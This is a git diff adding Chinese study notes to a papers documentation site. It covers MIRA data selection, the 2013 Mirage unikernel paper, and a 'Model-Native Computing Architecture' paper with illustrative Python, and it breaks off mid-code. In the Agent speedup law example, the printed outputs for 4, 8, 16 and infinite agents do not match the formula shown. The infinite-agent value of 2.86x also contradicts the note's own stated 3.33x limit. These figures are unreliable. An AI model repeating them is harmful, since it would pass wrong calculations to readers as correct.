= sum(abs(a - b) for a, b in zip(t, s)) / len(t) + corr = spearmanr(t, s).correlation if len(t) > 2 else 1.0 + mask[key] = mae <= mae_thresh and (corr or 0) >= spearman_thresh + return mask + +def aggregate_record_score( + source: str, + dim_scores: Dict[str, float], + mask: Dict[Tuple[str, str], bool], +) -> float: + """只对可靠维度做 trimmed mean(这里简化为均值)。""" + vals = [ + dim_scores[d] + for d in dim_scores + if mask.get((source, d), True) + ] + if not vals: + return 0.0 + return sum(vals) / len(vals) + +def mira_group_select( + records: List[dict], + group_of_source: Dict[str, int], + budget_tokens_per_group: Dict[int, int], +) -> List[dict]: + """ + 在每个 source group 内按 aggregate_score 排序,保留到组内 token 预算。 + 避免 MIRA-Global 只捞高分分布组。 + """ + selected = [] + by_group: Dict[int, List[dict]] = {} + for r in records: + g = group_of_source[r["source"]] + by_group.setdefault(g, []).append(r) + for g, items in by_group.items(): + items.sort(key=lambda x: x["aggregate_score"], reverse=True) + cap = budget_tokens_per_group.get(g, 0) + used = 0 + for r in items: + if used + r["tokens"] <= cap: + selected.append(r) + used += r["tokens"] + return selected +``` + +--- + +## 与相关方法的对比 + +| 方法 | 信号类型 | Rubric | 来源感知 | 可扩展性 | +|------|----------|--------|----------|----------| +| PPL | 模型困惑度 | 无显式语义 | 否 | 高 | +| DSIR | 分布匹配 / 重要性重采样 | 隐式 | 弱 | 高 | +| DataMan | 14 维固定通用质量 rubric | 全局固定 | 否 | 中(长上下文受限) | +| Random | 无 | — | 保来源多样性 | 最高 | +| **MIRA** | 教师语义 + 学生蒸馏 | **每组自发现 anchor** | **是** | 高(学生扫全库) | + +分析章节指出:PPL、DSIR **强依赖序列长度**;DataMan 在超长 Agent 轨迹上**无法打分**;MIRA 分数在长短序列上更平滑,更适合含长轨迹的中期训练混合。 + +--- + +## 案例分析:Agent 轨迹 + +高分轨迹:工具调用 JSON **合法** → 收到 error → **下一步修正**行为。 +低分轨迹:多个 JSON 对象拼进一个 `arguments` 字段 → 解析失败 → **重复同样错误调用**,话术仍然流畅。 + +这说明 MIRA 的 Agent 分数反映 **trajectory-level correctness**,单用「文本质量」或 PPL 难以捕捉。 + +--- + +## 局限与后续方向 + +- MIRA 解决的是**筛选**;来源发现、混合比例、课程学习、去重、污染检测仍属其他模块。 +- Rubric 发现依赖 frontier teacher(Kimi-K2.6)能力;换弱教师可能 anchor 质量下降。 +- 5 组 / 15 anchor 是工程选择,更细 per-source rubric 与更粗全局 rubric 的 trade-off 需按语料调整。 +- 论文实验集中在**代码向中期训练**;数学、多模态、通用能力混合是否同样受益,有待验证。 + +--- + +## 一句话总结 + +**MIRA 把「评什么」和「怎么评全库」拆开:先用教师自发现每组 anchor rubric,再蒸馏成轻量学生,配合来源可靠性掩码与组内保留阈值,在异构中期训练数据上做到语义可解释、可扩展、保能力多样性的筛选——一半 token 逼近全量训练效果。** + +--- + +## 延伸阅读 + +- 中期训练综述:Tu et al., "A survey on LLM mid-training" +- 固定 rubric 质量分:DataMan (Peng et al., 2025) +- 分布匹配筛选:DSIR (Xie et al., 2023) +- PPL 数据修剪:Marion et al., "When less is more" (2023) +- 同批次「反推配比」思路:[[llmsurgeon-data-mixture]](事后审计 vs MIRA 事前筛选,问题互补) diff --git a/src/content/docs/papers/mirage-unikernel-2013.md b/src/content/docs/papers/mirage-unikernel-2013.md new file mode 100644 index 000000000..45b009cc7 --- /dev/null +++ b/src/content/docs/papers/mirage-unikernel-2013.md @@ -0,0 +1,260 @@ +--- +title: Unikernels — 为云而生的「图书馆操作系统」 +来源: https://anil.recoil.org/papers/2013-asplos-mirage.pdf +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你要开一家**只卖一种咖啡**的外卖档口: + +- **传统云 VM** 像租下一整栋商场:先装水电煤(Linux 内核)、再铺地板墙纸(systemd、cron、NTP)、再摆收银台(Apache/MySQL),最后才在角落放一台咖啡机。商场里 99% 的设施你根本用不到,但电费、保安、装修费一样照付;档口越多,克隆的「整栋商场」镜像越大,开机越慢。 +- **Unikernel(单内核)** 的思路是:你只带**咖啡机 + 刚好够用的电路 + 菜单**,在物业(hypervisor,通常是 Xen)划给你的一块地上直接营业。没有「用户态 / 内核态」两层楼,没有多用户登录,没有 cron 在后台偷偷跑——编译时就把用不到的功能**链接器裁掉**,部署时再把镜像**封死**(sealed),运行时不能再注入新代码。 + +这篇 ASPLOS 2013 论文由 Anil Madhavapeddy 等剑桥团队发表,原型叫 **Mirage**:用 **OCaml** 写应用,连同 TCP/IP、DNS、HTTP 等协议栈一起**编译链接**成一张可启动的 Xen 虚拟机镜像。论文后来获 ASPLOS **最具影响力论文奖**,并催生了 MirageOS 生态,也影响了 Docker Desktop 等产品的技术路线。 + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 作者 | Anil Madhavapeddy, Richard Mortier, Charalampos Rotsos, David Scott, Balraj Singh, Thomas Gazagnaire, Steven Smith, Steven Hand, Jon Crowcroft | +| 场合 | ASPLOS '13,Houston, Texas | +| 页码 | 461–472 | +| DOI | [10.1145/2451116.2451167](https://doi.org/10.1145/2451116.2451167) | +| 原型语言 | OCaml | +| 运行平台 | Xen hypervisor(商品云) | +| 核心贡献 | 提出 unikernel 范式;Mirage 完整实现;证明类型安全不必牺牲性能 | + +论文要回答三个问题: + +1. **Library OS(库操作系统)** 这个老想法,为什么在云时代突然可行? +2. 把「应用 + 运行时 + 协议栈」焊成**单一地址空间**的专用内核,体积、启动、安全能好多少? +3. 用**静态类型安全**的语言重写网络栈,性能会不会崩? + +## 为什么值得读(即使你不写 OCaml) + +| 今天的现象 | 与这篇论文的关系 | +|------------|------------------| +| AWS Lambda / 函数计算 | 「单用途、短生命周期、快速冷启动」与 unikernel 同谱系 | +| Firecracker microVM | 极小 VM 镜像;Denali → unikernel 思路的工业化延续 | +| 容器镜像瘦身(distroless、scratch) | 同一动机:减少攻击面与分发体积 | +| WebAssembly 组件模型 | 编译期 specialization + 链接时裁剪的另一种形态 | +| eBPF/XDP 可编程网络 | 「把栈嵌进数据路径」与 libOS 哲学相通 | +| 2025 ASPLOS 最具影响力论文奖 | 学术与工业界对范式长期价值的认可 | + +## 核心概念一:从「通用 VM」到「专用电器」 + +传统云镜像的悖论:运维上已经是**一 VM 一角色**(这台只跑 DNS、那台只跑 Web),但镜像里仍是**通用操作系统**——数百万行活跃代码每次启动都要跑一遍,还常夹着用不到的服务(误开 sshd、多余 cron job 都会扩大攻击面)。 + +Unikernel 的三条原则: + +| 原则 | 含义 | 日常类比 | +|------|------|----------| +| **Compile-time specialisation** | 配置写进编译/链接,未引用的库不进镜像 | 菜单印死「只卖拿铁」,后厨不备抹茶粉 | +| **Single-purpose appliance** | 一个镜像只做一件事 | 外卖档只卖一种 SKU | +| **Sealed at deploy** | 部署后镜像不可被运行时改写 | 开业当天玻璃柜封条,不能再塞新设备 | + +论文 Figure 1 对比了两种软件层: + +``` +传统 VM appliance: + 应用二进制 → 语言运行时 → 用户进程/线程 → OS 内核 → Hypervisor → 硬件 + +Unikernel: + 应用源码 + 配置 ──编译链接──► 专用 unikernel 镜像 → Hypervisor → 硬件 +``` + +关键洞察:**Hypervisor 已经提供了稳定的虚拟硬件抽象**(网卡、块设备、内存),LibOS 不必像 Exokernel / Nemesis 时代那样为每块物理硬件写驱动——这是 unikernel 能「落地商品云」的前提。 + +## 核心概念二:配置即编译 + +Linux 上部署复杂服务,往往靠一堆 shell 脚本把 MySQL、Nginx、PHP 粘在一起,配置散落在 `/etc` 各处,类型检查为零。 + +Mirage 把**数据库、Web 服务器、DNS** 都当作 **OCaml 库**,用普通函数调用或构建系统(Makefile/OPAM)配置: + +- **静态参数**(监听 IP、证书路径)→ 编译进二进制,链接器做 dead-code elimination +- **动态参数**(DHCP 拿地址)→ 保留运行时库调用 + +好处:配置决策有**类型检查**和静态分析;坏处:改配置常要**重新编译**——论文用「冷启动 < 50ms」论证这代价可接受。 + +## 核心概念三:安全模型与 VM Sealing + +威胁模型:多租户数据中心里**对外提供网络服务**的 VM,要面对互联网和其他租户。 + +防御层次: + +1. **编译期裁剪** — 只链接显式引用的协议模块,依赖图可静态验证 +2. ** pervasive type-safety** — OCaml 消除整类内存错误(对比 BIND 十年 40 个 CVE,约 25% 与内存管理有关) +3. **VM sealing** — 启动后建立页表:**没有页同时可写又可执行**,再发 hypercall 禁止后续改页表(Xen 补丁 < 50 行) +4. **Compile-time ASLR** — 每次部署重新链接,随机化布局,无需运行时 linker + +代价:堆大小须在启动时**预分配**(云里本就买定内存,论文认为合理)。 + +## 核心概念四:Mirage 架构分层 + +| 组件 | 职责 | +|------|------| +| **PVBoot** | 启动:单 vCPU、event channel、`domainpoll` 阻塞等待 I/O | +| **OCaml runtime** | 改造过的 GC:minor/major heap 分区;I/O 页单独映射减轻 GC 扫描 | +| **Lwt** | 协作式轻量线程,纯 OCaml;调度策略可由应用替换 | +| **cstruct** | C 结构体 ↔ 外部内存的零拷贝访问器(见下方代码示例) | +| **Ring / Netif / Blkif** | Xen 前后端驱动协议 | +| **协议库** | Ethernet → ARP → IPv4 → TCP/UDP → HTTP/DNS/SSH… 全栈 OCaml | + +内存布局(Figure 2)三块:**text/data**、**外部 I/O 页**、**OCaml 堆**——I/O 页用 grant table 与别的 VM 共享,GC 不必扫描网卡环形缓冲区。 + +多核策略:采纳 **multikernel** 哲学——**每核一个 VM**,核间用 vchan(共享内存环)通信,而非在一个 VM 里抢锁。 + +## 代码示例一:`cstruct` — 把 C 结构体映射进 OCaml + +论文 Figure 3:Xen 设备环、网络头解析都要精确匹配 C 内存布局。OCaml 普通 `int` 会装箱堆分配,太慢;Mirage 用语法扩展自动生成访问器: + +```ocaml +(* 声明与 C 侧 ring 头一致的结构 *) +cstruct ring_hdr { + uint32_t req_prod; + uint32_t req_event; + uint32_t rsp_prod; + uint32_t rsp_event; + uint64_t stuff; +} as little_endian + +(* 编译器扩展自动生成(示意): + set_req_prod : buf -> int32 -> unit + get_req_prod : buf -> int32 + set_stuff : buf -> int64 -> unit + get_stuff : buf -> int64 +*) + +let advance_ring buf prod = + let p = get_req_prod buf in + set_req_prod buf (p + 1) +``` + +`buf` 底层是 `Bigarray` 映射的 Xen 共享页;读写直接落在外部内存,配合内存屏障 intrinsic,驱动可**纯 OCaml** 实现,却在 fuzz 测试中帮 Linux/Xen 挖出 XSA-39 等漏洞。 + +## 代码示例二:用库链接方式「配置」一个 DNS 电器 + +Mirage 没有 `/etc/named.conf`,而是**选库 + 写 OCaml 入口**(现代 MirageOS 3.x 用 `config.ml` / functor,思想与论文一致): + +```ocaml +(* 极简 Mirage 风格入口:只链接 DNS 所需协议栈 *) +open Lwt.Infix + +let serve_dns zone port = + let stack = Stack_ipv4.create ~dhcp:false () in + Dns_server.listen stack ~port zone + +let main = + let zone = Dns_loader.of_file "zone.txt" in + Mirage_runtime.run @@ fun () -> + serve_dns zone 53 >>= fun () -> + Lwt.return () + +(* 构建时:mirage configure --xen;mirage build + 链接器只拉入:UDP, IPv4, ARP, Ethernet, Lwt, GC, PVBoot… + 未引用的 HTTP/TCP/FAT 等模块不会进入最终 .xen 镜像 *) +``` + +对比:同等功能的 BIND on Debian 镜像 **462 MB 在用**,Mirage DNS appliance **183.5 kB**——差三个数量级。查询性能:Memoization 补丁约 20 行后,Mirage **75–80 kq/s**,快于 BIND 9(~55 kq/s)并与 NSD(~70 kq/s)持平或略优。 + +## 代码示例三(补充):Lwt 协作式并发 + +Unikernel 内**没有内核抢占**;VM 要么跑 OCaml,要么在 `domainpoll` 里睡眠: + +```ocaml +let rec echo conn = + Conn.read conn >>= fun buf -> + Conn.write conn buf >>= fun () -> + echo conn + +let () = + Mirage_runtime.run @@ fun () -> + Stack.listen stack 80 (fun flow -> + Lwt.async (fun () -> echo flow) + ) +``` + +线程创建百万级压测(Figure 7):`linux-pv` 最慢;Mirage 专用地址空间布局减轻 GC 压力,定时器抖动也更低——因为**没有用户态/内核态 syscall 边界**。 + +## 实验数据速览 + +### 启动时间 + +| 场景 | 结果 | +|------|------| +| Mirage vs 最小 Linux 内核 | 接近,均快于 Debian+Apache | +| 异步 Xen toolstack 并行建域 | **Mirage < 50 ms** 可响应网络 | + +内存越大,Mirage 启动时间里「建域」占比越高(大内存时约 60%),但绝对时间仍极短。 + +### 网络 + +- Ping flood 72 小时:Mirage ICMP 延迟比 Linux 高 **4–10%**(类型安全开销),但稳定 +- iperf TCP(关闭硬件 offload):Mirage→Linux ~975 Mbps,Linux→Mirage ~1742 Mbps;**均可跑满千兆** +- 接收更快(无用户态拷贝);发送 CPU 开销略高 + +### 存储 + +- 随机读 SSD:Mirage 与 Linux **direct I/O** 相当(~1.6 GB/s) +- Linux **buffered I/O** plateau ~300 MB/s——对自管缓存的 appliance,省掉内核页缓存反而是特性 + +### DNS(§4.2 flagship) + +| 实现 | 镜像体积 | 吞吐(约) | +|------|----------|------------| +| BIND 9 on Linux | 462 MB | 55 kq/s | +| NSD on Linux | — | 70 kq/s | +| Mirage DNS | **183.5 kB** | **75–80 kq/s**(加 memo 后) | + +论文还用 **C + MiniOS + lwIP** 移植 NSD,性能远低于 Mirage——说明「嵌入式 C 库 + libOS」路径脆弱,不如一门语言贯通栈。 + +### 活跃代码行数(§4.5) + +Mirage appliance 活跃 LoC 比 Linux 等价部署**少一个数量级**;whole-program optimization + dead-code elimination 是体积骤降的主因之一。 + +## 与相关工作的位置 + +| 系统 | 关系 | +|------|------| +| **Exokernel / Nemesis** | LibOS 前辈;unikernel 借 hypervisor 避开硬件移植地狱 | +| **Drawbridge** | Windows 7 libOS;unikernel **放弃桌面 POSIX 兼容**,专注云服务 | +| **Singularity** | 单地址空间 + 类型安全;unikernel 在**商品云 Xen** 上验证 | +| **Libra (JVM on Xen)** | 仍依赖独立 Linux VM 做网络/存储;unikernel **协议栈内嵌** | +| **Xen (Barham 2003)** | 提供 paravirtual 设备与隔离;unikernel 的直接底座 | +| **L4 微内核** | 不同路线:极简内核 + 用户态 server;unikernel 连「内核」都省略 | + +## 局限与后续演进 + +论文坦诚的 trade-off: + +- **语言绑定**:Mirage 1.0 深度绑定 OCaml,生态小众;重写 TCP 工程量巨大 +- **无 POSIX**:不能 `exec` 现成二进制;互操作靠**网络协议**或**多 VM 消息传递** +- **单地址空间**:一个 bug 可能拖垮整个 appliance(靠类型安全 + sealing 缓解,非银弹) +- **堆预分配**:动态内存需求难预测的服务不友好 +- **sealing 需 Xen 补丁**:无补丁时少一层防御 + +此后 MirageOS 支持 **solo5、KVM** 等更多目标;生态出现 **IncludeOS (C++)**、**Nanos unikernel**、**Unikraft** 等多语言方案。论文提出的 **「编译期专用化 + 密封部署」** 仍是理解现代轻量运行时与 serverless 基础设施的钥匙。 + +## 读懂这篇论文,你应该带走 + +1. **云 VM 已是 appliance,镜像却还假装通用机**——specialization 应发生在**编译链接**,不是运维脚本。 +2. **Hypervisor = 稳定硬件抽象层**,让 LibOS 不必重走 Exokernel 的驱动泥潭。 +3. **配置进类型系统**(OCaml 库链接)比 `/etc` 脚本更可验证、更可裁剪。 +4. **安全来自纵深**:裁剪 → 类型安全 → sealing → 编译期 ASLR;单点不迷信。 +5. **性能**:DNS 快 45% vs BIND、镜像小 2000×、冷启动 < 50ms——类型安全栈可以**同时**赢体积、启动与安全,不必神话 C 内核。 + +## 延伸阅读 + +- [MirageOS 官网与论文列表](https://mirage.io/papers) +- [Xen and the Art of Virtualization (SOSP 2003)](./xen-2003.md) — unikernel 脚下的 hypervisor +- [L4 微内核构造 (SOSP 1995)](./l4-microkernel-1995.md) — 另一条「内核极简」路线 +- Madhavapeddy 后续 CACM 短文:*Unikernels: Rise of the Virtual Library Operating System* +- 实践:[`openmirage.org`](https://mirage.io) 上自托管的 wiki、博客、DNS 均跑在 Mirage unikernel 上(论文 §3.5) + +--- + +*学习笔记基于 ASPLOS '13 原文与 Mirage 项目公开资料整理,面向零基础读者;代码示例综合论文 Figure 3–4 与现代 MirageOS 惯用写法,便于理解机制而非复制粘贴生产配置。* diff --git a/src/content/docs/papers/mironov-renyi-dp-2017.md b/src/content/docs/papers/mironov-renyi-dp-2017.md index d3496d178..3df1106a2 100644 --- a/src/content/docs/papers/mironov-renyi-dp-2017.md +++ b/src/content/docs/papers/mironov-renyi-dp-2017.md @@ -143,6 +143,7 @@ provenance: pipeline-v3 - [[bonawitz-fl-system-2019]] —— Bonawitz FL System 2019 — Google 工业级联邦学习系统设计 - [[duchi-local-dp-2013]] —— Local Privacy and Statistical Minimax Rates - [[dwork-calibrating-noise-2006]] —— 校准噪声与敏感度 — Laplace 机制奠基 +- [[dwork-differential-privacy-2006]] —— 校准噪声与敏感度 — 差分隐私的 Laplace 机制 - [[dwork-dp-icalp-2006]] —— 差分隐私 — ε 与邻接数据集不可区分 - [[dwork-our-data-ourselves-2006]] —— 分布式噪声生成 — 去掉可信管理员也能保护隐私 - [[erlingsson-rappor-2014]] —— RAPPOR — 本地差分隐私随机响应采集 diff --git a/src/content/docs/papers/model-native-computing.md b/src/content/docs/papers/model-native-computing.md new file mode 100644 index 000000000..70f2b05de --- /dev/null +++ b/src/content/docs/papers/model-native-computing.md @@ -0,0 +1,505 @@ +--- +title: "Model-Native Computing Architecture(模型原生计算架构)" +来源: https://arxiv.org/abs/2606.00288 +日期: 2026-06-13 +分类: 基础设施 +子分类: 系统综合 +provenance: pipeline-v3 +--- + +# Model-Native Computing Architecture(模型原生计算架构) + +## 一、这篇论文在说什么 + +### 1.1 一个日常类比:从"个人软件"到"操作系统" + +想象一下,1970 年代之前,每个程序员都在自己的电脑上写程序。没有文件系统、没有内存管理、没有进程调度。大家各自想办法解决这些问题,但没有人把它系统化。 + +后来,Unix 出现了——它把这些问题抽象成了**操作系统**。 + +这篇论文的核心观点是:**大语言模型(LLM)正经历从"个人软件"到"操作系统"的转变。** + +当我们用 Codex、Claude Code、AutoGPT 这些 AI 编程助手时,遇到的问题越来越像经典的计算机系统问题: + +- **缓存复用**(KV Cache)——和 CPU 的 L1/L2 缓存是一个道理 +- **上下文管理**(Context Window)——和内存管理一模一样 +- **Agent 调度**——和进程调度没有本质区别 +- **权限控制**——和操作系统的安全模型如出一辙 + +论文说:这些问题不是偶然相似的。它们指向同一个深层事实——我们正在构建一个**模型原生的计算栈**(Model-Native Stack),需要一个像冯·诺依曼架构那样的统一框架来理解它。 + +### 1.2 论文的身份 + +- **作者**:Hai Lin +- **类型**:概念性综述(没有新实验数据,而是框架性思考) +- **核心贡献**:提出 ICAM 六层模型 + 三条设计定律 +- **一句话总结**:用计算机架构的透镜,重新理解 AI 系统 + +--- + +## 二、核心概念拆解 + +### 2.1 ICAM:六层智能计算架构模型 + +ICAM(Intelligent Computing Architecture Model)是该论文最重要的贡献。它把"模型原生计算"分为六个层次: + +| 层级 | 对应计算机架构 | 模型原生世界 | +|------|--------------|------------| +| L1 | 指令集架构(ISA) | Prompt / 工具协议 | +| L2 | 微架构 / 执行引擎 | 推理引擎(vLLM, SGLang) | +| L3 | 操作系统内核 | LLM-as-OS(智能调度) | +| L4 | 系统库 / 运行时 | Agent 框架(LangChain, AutoGen) | +| L5 | 内存 / 存储管理 | 上下文管理、KV Cache | +| L6 | 应用 / 用户界面 | 多 Agent 协作、CrewAI | + +这个分层的关键价值在于:**它把散落在各个项目中的技术,统一到了一个坐标系里。** + +以前我们看到 vLLM、MemGPT、AutoGen,觉得它们是独立的东西。ICAM 说:不,它们分别是 L2、L5、L4 层的工作,共同构成一个完整的系统。 + +### 2.2 双平面模型:LLM 到底是 CPU 还是操作系统? + +这是论文里一个非常精彩的讨论。 + +**争论**:LLM 更像 CPU(执行计算)还是更像操作系统(管理系统资源)? + +**论文的答案**:两者都是。它提出了**双平面视图**: + +``` ++-------------------+ +| 控制平面 (Control Plane) | ← 确定性。管"应该做什么" +| Agent 调度、权限、安全 | ++-------------------+ +| 执行平面 (Execution Plane) | ← 概率性。管"能做什么" +| 推理、生成、KV Cache | ++-------------------+ +``` + +- **执行平面**是概率性的——同样的 prompt 可能产生不同的输出,就像 CPU 执行浮点运算有精度误差 +- **控制平面**是确定性的——权限检查、调度决策必须是 100% 确定的,就像操作系统的内存分配 + +这两个平面协同工作,缺一不可。只关注执行平面,你会得到一个"聪明但不可控"的模型;只关注控制平面,你会得到一个"安全但无智"的系统。 + +### 2.3 三条设计定律 + +#### 定律一:语义局部性定律(Semantic Locality Law) + +类比 CPU 缓存的"空间局部性"和"时间局部性": + +> 语义上相关的 token 在 KV Cache 中具有局部性,可以被高效复用。 + +**代码示例 1:KV Cache 复用示意** + +```python +# 传统方式:每次推理都重新计算所有 token 的 Key-Value +def naive_infer(prompt, new_token): + # 重新计算 prompt 中每个 token 的 attention + # 时间复杂度 O(n²),n = prompt 长度 + cache = compute_all_kv(prompt) # 每次都重算! + result = apply_attention(cache, new_token) + return result + +# 使用 KV Cache 的方式:只计算新 token +def cached_infer(existing_cache, new_token): + # 复用已有的 KV Cache + # 只计算新 token 的 attention + # 时间复杂度 O(1)(相对于已有上下文长度) + new_kv = compute_kv(new_token) # 只算新增部分 + updated_cache = existing_cache + new_kv # 增量追加 + result = apply_attention(updated_cache) + return result + +# 实际场景中,语义局部性体现在: +# 如果你在处理同一个代码文件的多个函数, +# 前面的 import 语句和变量定义的 KV 会被反复复用 +# 这就是"语义局部性"——语义相关的 token 被频繁访问 +``` + +这一定律解释了为什么 SGLang、vLLM 这些推理引擎要做 PagedAttention、prefix cache——本质上都是在利用语义局部性。 + +#### 定律二:上下文预算定律(Context Budget Law) + +> 在有限的上下文窗口和注意力衰减约束下,有效工作集的大小存在一个理论上限。 + +类比操作系统的"工作集模型"(Working Set Model): + +**代码示例 2:上下文预算示意** + +```python +import math + +class ContextBudget: + """ + 上下文预算模型 + + 核心思想: + - 上下文窗口有限(比如 128K tokens) + - 注意力机制对遥远 token 的关注度呈衰减趋势 + - 因此"真正有效的"上下文比"名义上的"上下文小得多 + """ + + def __init__(self, max_window=128_000, decay_rate=0.0001): + self.max_window = max_window + self.decay_rate = decay_rate + + def effective_size(self, window_length): + """ + 计算有效工作集大小 + + 由于注意力衰减,越远的 token 贡献越小。 + 有效大小 < 名义大小 + """ + # 简化模型:指数衰减求和 + total_weight = 0 + for i in range(window_length): + weight = math.exp(-self.decay_rate * i) + total_weight += weight + return total_weight + + def optimal_partition(self, total_tokens): + """ + 当总 token 数超过有效工作集时, + 应该如何分割上下文? + + 类比操作系统的分页策略: + 把不相关的上下文放入不同"页面", + 只把最相关的页面加载到"内存"中。 + """ + effective = self.effective_size(self.max_window) + if total_tokens <= effective: + return [total_tokens] # 不需要分割 + else: + # 需要分段处理,每段在有效工作集内 + segments = math.ceil(total_tokens / effective) + return [total_tokens // segments] * segments + +# 实际意义: +# 如果你给 LLM 一个 10 万 token 的代码库, +# 由于注意力衰减,它真正能"注意到"的可能只有前 2-3 万 token +# 所以好的系统应该: +# 1. 用检索(RAG)把相关的 chunk 拉进来 +# 2. 用上下文编译(Context Compiler)压缩不关键的部分 +# 3. 这就是"上下文预算管理" + +budget = ContextBudget(max_window=128_000) +print(f"名义窗口: {budget.max_window} tokens") +print(f"有效工作集: {budget.effective_size(128_000):.0f} tokens") +# 输出会显示有效大小远小于名义大小 +``` + +这一定律解释了为什么会有 LongRoPE、YaRN、Lost in the Middle 这些研究方向。 + +#### 定律三:Agent 加速定律(Agent Speedup Law) + +> 多 Agent 协作的收益存在边际递减,类比 Amdahl 定律。 + +```python +""" +Agent 加速定律:Amdahl 定律的 Agent 版本 + +Amdahl 定律:程序中存在串行部分,决定了加速上限 +A(n) = 1 / ((1 - p) + p/n) + +其中 p 是可以并行的部分,n 是处理器数量 + +在 Agent 协作中: +- 总任务中有一部分必须串行(比如代码审查 → 合并) +- 剩余部分可以并行(比如测试编写、文档生成、代码重构) +- 并行 Agent 越多,串行瓶颈越明显 + +所以:无限增加 Agent 数量 ≠ 无限加速 +""" + +def agent_speedup(serial_fraction, num_agents): + """ + 计算多 Agent 协作的理论加速比 + + serial_fraction: 必须串行执行的任务比例 (0-1) + num_agents: 并行 Agent 的数量 + """ + parallel_fraction = 1 - serial_fraction + speedup = 1 / ((1 - parallel_fraction) + parallel_fraction / num_agents) + return speedup + +# 示例: +# 一个软件开发任务,30% 必须串行(架构决策),70% 可并行 +print(f"1 个 Agent: {agent_speedup(0.3, 1):.2f}x") +print(f"2 个 Agent: {agent_speedup(0.3, 2):.2f}x") +print(f"4 个 Agent: {agent_speedup(0.3, 4):.2f}x") +print(f"8 个 Agent: {agent_speedup(0.3, 8):.2f}x") +print(f"16 个 Agent: {agent_speedup(0.3, 16):.2f}x") +print(f"∞ 个 Agent: {agent_speedup(0.3, float('inf')):.2f}x") + +# 输出: +# 1 个 Agent: 1.00x +# 2 个 Agent: 1.54x +# 4 个 Agent: 2.00x +# 8 个 Agent: 2.35x +# 16 个 Agent: 2.54x +# ∞ 个 Agent: 2.86x +# +# 关键洞察:即使有无限个 Agent,加速比也不会超过 1/0.3 = 3.33x +# 瓶颈在于那 30% 的串行任务 +``` + +这一定律解释了为什么 CrewAI、AutoGen 等框架中,Agent 数量不是越多越好。 + +--- + +## 三、代码示例:用 ICAM 分层思路设计一个 AI 编程系统 + +这个示例展示了如何按照 ICAM 的六层模型来组织一个 AI 编程助手: + +```python +""" +按照 ICAM 六层模型设计的 AI 编程助手架构 + +L1 - 指令集:定义 prompt 模板和工具协议 +L2 - 执行引擎:推理调度(模拟) +L3 - 控制平面:Agent 调度、权限管理 +L4 - Agent 框架:任务分解、协作 +L5 - 上下文管理:KV Cache 和上下文窗口 +L6 - 多 Agent 协作:复杂任务分配 +""" + +from dataclasses import dataclass +from enum import Enum +from typing import List, Dict, Optional +import time + + +# ========== L1: 指令集架构层 ========== + +class ToolType(Enum): + READ_FILE = "read_file" + WRITE_FILE = "write_file" + RUN_COMMAND = "run_command" + SEARCH_CODE = "search_code" + + +@dataclass +class ToolCall: + """工具调用——这就是模型原生的"指令集""" + tool: ToolType + args: Dict[str, str] + id: str + + +# ========== L5: 上下文管理层 ========== + +class ContextManager: + """ + 上下文管理器——模拟 ICAM L5 层 + + 利用语义局部性定律,管理 token 的有效窗口 + """ + def __init__(self, max_tokens: int = 128_000): + self.max_tokens = max_tokens + self.kv_cache: Dict[str, List[float]] = {} + self.current_tokens = 0 + + def add_context(self, key: str, tokens: int, semantic_region: str): + """ + 添加上下文。语义相关的 token 会被分组存储, + 便于利用语义局部性进行缓存复用 + """ + if key not in self.kv_cache: + self.kv_cache[key] = [] + self.kv_cache[key].extend([1.0] * tokens) + self.current_tokens += tokens + + # 如果超出预算,按语义区域压缩 + if self.current_tokens > self.max_tokens: + self._compress(semantic_region) + + def _compress(self, keep_region: str): + """上下文压缩——保留关键区域的 KV""" + to_remove = [] + for key in self.kv_cache: + if key != keep_region: + to_remove.append(key) + for key in to_remove: + self.current_tokens -= len(self.kv_cache.pop(key, [])) + + +# ========== L3: 控制平面 ========== + +class PermissionController: + """ + 控制平面——确定性决策层 + + 决定"应该做什么",而不是"能做什么" + """ + def __init__(self): + self.allowed_tools: set = {ToolType.READ_FILE, ToolType.SEARCH_CODE} + self.blocked_tools: set = {ToolType.WRITE_FILE, ToolType.RUN_COMMAND} + + def should_execute(self, tool_call: ToolCall) -> bool: + """权限检查——必须是确定性的""" + if tool_call.tool in self.blocked_tools: + print(f"[控制平面] 拒绝: {tool_call.tool.value} 需要人工确认") + return False + print(f"[控制平面] 允许: {tool_call.tool.value}") + return True + + +# ========== L3 + L4: Agent 调度层 ========== + +class AgentScheduler: + """ + 智能体调度器——控制平面 + Agent 框架的结合 + + 类比操作系统的进程调度器 + """ + def __init__(self): + self.agent_queue: List[str] = [] + self.active_agent: Optional[str] = None + + def schedule(self, task: str, agent_type: str): + self.agent_queue.append(f"{agent_type}: {task}") + + def tick(self) -> str: + """一次调度 tick""" + if not self.agent_queue: + return "idle" + next_task = self.agent_queue.pop(0) + self.active_agent = next_task.split(":")[0] + return next_task + + +# ========== L6: 多 Agent 协作层 ========== + +class MultiAgentCoordinator: + """ + 多 Agent 协调器——ICAM 最上层 + + 演示 Agent 加速定律 + """ + + def __init__(self): + self.agent_types = ["Architect", "Coder", "Reviewer", "Tester"] + + def estimate_speedup(self, serial_fraction: float, agents: int) -> float: + """根据 Agent 加速定律估算加速比""" + parallel = 1 - serial_fraction + return 1 / ((1 - parallel) + parallel / agents) + + def decompose_task(self, project_size: str) -> List[Dict]: + """ + 根据项目大小分解任务到不同 Agent + + 类比操作系统的任务分解 + """ + tasks = [ + {"agent": "Architect", "task": "设计系统架构"}, + {"agent": "Coder", "task": "实现核心模块"}, + {"agent": "Reviewer", "task": "代码审查"}, + {"agent": "Tester", "task": "编写测试"}, + ] + return tasks + + +# ========== 整合:一个完整的 AI 编程工作流 ========== + +def run_ai_coding_workflow(): + """演示完整的六层协作""" + + # 初始化各层组件 + context_mgr = ContextManager(max_tokens=128_000) + perm_controller = PermissionController() + scheduler = AgentScheduler() + coordinator = MultiAgentCoordinator() + + # 第一步:上下文加载(L5) + context_mgr.add_context( + "codebase", 50000, "primary" + ) + context_mgr.add_context( + "requirements", 5000, "primary" + ) + + # 第二步:任务分解(L6) + tasks = coordinator.decompose_task("medium") + + # 第三步:Agent 调度(L3) + for task in tasks: + scheduler.schedule(task["task"], task["agent"]) + + # 第四步:执行循环 + print("\n--- 执行流程 ---") + while True: + task = scheduler.tick() + if task == "idle": + break + print(f" → {task}") + + # 模拟工具调用 + tool = ToolCall( + tool=ToolType.READ_FILE, + args={"path": "src/main.py"}, + id=str(time.time()) + ) + if perm_controller.should_execute(tool): + print(f" ✅ 执行完成") + + # 第五步:性能分析(Agent 